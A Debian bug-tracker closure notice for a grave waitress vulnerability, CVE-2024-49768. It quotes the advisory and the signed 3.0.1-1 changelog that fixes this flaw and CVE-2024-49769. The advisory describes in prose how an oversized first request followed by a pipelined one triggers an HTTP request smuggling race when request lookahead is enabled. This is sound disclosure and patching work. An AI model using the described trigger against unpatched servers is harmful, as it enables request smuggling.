Your message dated Thu, 31 Oct 2024 08:23:19 +0000
with message-id <e1t6qsd-00dpfi...@fasolo.debian.org>
and subject line Bug#1086467: fixed in waitress 3.0.1-1
has caused the Debian Bug report #1086467,
regarding waitress: CVE-2024-49768: Request processing race condition in HTTP
pipelining with invalid first request
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1086467: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1086467
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: waitress
Version: 3.0.0-1
Severity: grave
Tags: security upstream
X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org>
Control: found -1 2.1.2-2
Hi,
The following vulnerability was published for waitress.
CVE-2024-49768[0]:
| Waitress is a Web Server Gateway Interface server for Python 2 and
| 3. A remote client may send a request that is exactly recv_bytes
| (defaults to 8192) long, followed by a secondary request using HTTP
| pipelining. When request lookahead is disabled (default) we won't
| read any more requests, and when the first request fails due to a
| parsing error, we simply close the connection. However when request
| lookahead is enabled, it is possible to process and receive the
| first request, start sending the error message back to the client
| while we read the next request and queue it. This will allow the
| secondary request to be serviced by the worker thread while the
| connection should be closed. Waitress 3.0.1 fixes the race
| condition. As a workaround, disable channel_request_lookahead, this
| is set to 0 by default disabling this feature.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2024-49768
https://www.cve.org/CVERecord?id=CVE-2024-49768
[1] https://github.com/Pylons/waitress/security/advisories/GHSA-9298-4cf8-g4wj
Regards,
Salvatore
--- End Message ---
--- Begin Message ---
Source: waitress
Source-Version: 3.0.1-1
Done: Colin Watson <cjwat...@debian.org>
We believe that the bug you reported is fixed in the latest version of
waitress, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 1086...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Colin Watson <cjwat...@debian.org> (supplier of updated waitress package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Wed, 30 Oct 2024 23:22:09 +0000
Source: waitress
Architecture: source
Version: 3.0.1-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Python Team <team+pyt...@tracker.debian.org>
Changed-By: Colin Watson <cjwat...@debian.org>
Closes: 1086467 1086468
Changes:
waitress (3.0.1-1) unstable; urgency=medium
.
* Team upload.
* New upstream release:
- CVE-2024-49768: Fix a race condition in Waitress when
`channel_request_lookahead` is enabled that could lead to HTTP request
smuggling (closes: #1086467).
- CVE-2024-49769: Fix a bug that would lead to Waitress busy looping on
select() on a half-open socket due to a race condition that existed
when creating a new HTTPChannel (closes: #1086468).
Checksums-Sha1:
9869bbe1ad67e6a2769cd8dc12b47ea54014ca9f 2410 waitress_3.0.1-1.dsc
56f5c350cb329058f2ed996f46a6a809d0a8994f 174572 waitress_3.0.1.orig.tar.gz
275cc984f9952d39ae85bfc1638c29e07b83cba6 8164 waitress_3.0.1-1.debian.tar.xz
Checksums-Sha256:
3e5a0500fc3548ba2ab39950c80b8142b53177da5a80a3675feaf6c9a63eaa77 2410
waitress_3.0.1-1.dsc
1580a323734fbf3a95a2ed98e0cb3d3938fa7ef97f1a31897a26bd246ed5a70d 174572
waitress_3.0.1.orig.tar.gz
f6f41b0767fda30ad86b48c109ed46bc3f5180d5fd4bf9fcacb859f290933307 8164
waitress_3.0.1-1.debian.tar.xz
Files:
475cd69ad8088c8b566da718819f28e6 2410 python optional waitress_3.0.1-1.dsc
b70b7601406e1bdb5514108421b9e930 174572 python optional
waitress_3.0.1.orig.tar.gz
8d7eb1a8a197a63d4c4e9b704aec24e6 8164 python optional
waitress_3.0.1-1.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEErApP8SYRtvzPAcEROTWH2X2GUAsFAmciwAIACgkQOTWH2X2G
UAtjkQ//TfP4S/CP25Zt+M5rXgqZzCs+F4PqyRG8DfLYG7fTEgd1a3DlBDLdH70R
rO2Ld/wSU7cB+2uYfYi9UTdESbao37IESNNe9KjQM6TEW6hZb6TFoAxPVAj6e3oi
zyNoio4B8LbkDDf4ADM2cM3Ln7OUqYR6Pqx4B3xWBqka3ao6t8v4+zPyAXKhz+Ic
+CwucYe0eR7dNDmQDjK6ICpAa84PJ8w1WAPu1D3QmkMckZ4WnadtC00WZDAiQ29y
FU89RDvnoiMb1Zwqx9BosslShSr0EbrgtAPSpGj1I2qGH3Vb1mjigU8mm/ou1nlB
el+6grDrzx45hhkYlRtpn5WyQT12/MYoYGczf58VHLzBANL3Jd9N+anXl9RhfybM
zhBv5daPjnehkiTBiAo3Bkzvd2JRuSexNKIkhvmogEHvPpTTYxaHo6jGNVdJZryy
pVYuhf6rFWqoeq8Beqxltz/PJTkbO/u2Dl03VfWIj1FY4LusiWZMX9EbpkBboO87
y8ddPPeBwWIklDq7pkiA+9P1jlof8PiXw08DbG4oXYqV1qmwBY1PH5oSZKCxk6Sg
cw17WeOmh6dZdVLRTFZe9PWLI/JyIySaSsb8UGlhBD6XiADyER5FJIkHIr30xhxP
qVYq/D3urgLtt0vrwt3UX62v5ab/XD/PQ0pLaDfag3O2auj636s=
=TiLO
-----END PGP SIGNATURE-----
pgpYFP2H8BAdt.pgp
Description: PGP signature
--- End Message ---
